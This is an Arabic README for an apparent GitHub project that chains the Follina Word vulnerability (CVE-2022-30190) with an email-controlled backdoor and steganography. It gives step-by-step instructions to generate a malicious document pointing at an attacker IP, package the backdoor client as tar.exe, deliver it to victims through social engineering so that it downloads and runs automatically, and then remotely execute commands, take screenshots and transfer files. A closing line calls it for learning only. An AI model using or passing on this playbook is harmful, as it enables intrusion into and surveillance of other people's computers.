AmzWord
سلسلة هجوم آلية تستند إلى CVE-2022-30190، وباب خلفي لبريد 163 الإلكتروني، وإخفاء الصور بالكتابة الخفية (Steganography)
نشكر المستودعات التالية على GitHub، حيث استندنا إليها وعدّلنا جزءًا من الكود لدمج عملنا وتنفيذه:
النسخة الصينية من README من هنا
المتطلبات
gdog:
- Python 2.7
- وحدة PyCrypto
- وحدة WMI
- وحدة Enum34
- وحدة Netifaces
follina:
الاستخدام وسير الهجوم
-
استخدم follina.py لإنشاء ملف Word خبيث وتشغيل الاستماع عبر HTTP
- يمكنك تغيير الاسم الافتراضي والـ IP الافتراضي في الكود
- يمكنك أيضًا استخدام
--ip و--output للتحديد
- يُرجى الرجوع إلى follina للاستخدام المفصّل. لم نغيّر واجهة الاستخدام.
- مثال:
python follina.py --ip 100.100.100.100 --output maldoc.doc
-
عدّل client.py وgdog.py داخل gdog واملأ المعلومات التالية
gmail_user = 'your email'
gmail_pwd = 'your pwd'
server = "smtp server"
imap_server = 'imap server'
-
ادمج client.py في ملف tar.exe وضعه داخل /follina/www
-
استخدم أي وسيلة من وسائل الهندسة الاجتماعية لإرساله إلى الهدف. فما إن يفتح الضحية ملف word حتى يتم تنزيل tar.exe وتنفيذه تلقائيًا.
-
يشغّل المهاجم gdog محليًا ويرسل الأوامر للتحكم في الجهاز الهدف. لمعرفة طريقة الاستخدام، راجع gdog
ملاحظات
- هذا مجرد عرض توضيحي لتطبيق سلسلة الهجوم. يمكن حتى العثور على ملف exe قيد التشغيل في إدارة المهام، مما يسهّل ملاحظة التأثير. لم نقم بأي عمليات مثل مكافحة الفيروسات أو الإخفاء أو تصعيد الامتيازات. وبالطبع، هذه الأمور ليست صعبة على ويندوز، أليس كذلك؟
- مشروع gdog قديم وقد مضى عليه وقت طويل، وقد بذلنا الكثير من الجهد لجعله يعمل بنجاح. تشمل أوامر التحكم عن بُعد المؤكدة حاليًا: تنفيذ الأوامر، التقاط لقطات الشاشة، النوافذ المنبثقة، إيقاف التشغيل، قفل الشاشة، ونقل الملفات. هذه الوظائف كافية لتلبية معظم الاحتياجات.
- لا أعرف السبب، لكن يبدو أن هناك مشكلة في البحث في حقل SUBJECT في imap. لا يمكننا البحث عن الرسائل ذات الموضوع المستهدف، وتكون القيمة المرجعة فارغة. لا يمكننا سوى اعتماد طرق أخرى، مثل قراءة جميع الرسائل غير المقروءة، وتصفية الرسائل المستهدفة، ثم تعيين الباقي كغير مقروء. قد يسبب هذا مشاكل عندما يكون عدد المستخدمين المتحكَّم فيهم كبيرًا، ويحتاج إلى حل.
- هذا المشروع لأغراض التعلم والتبادل فقط.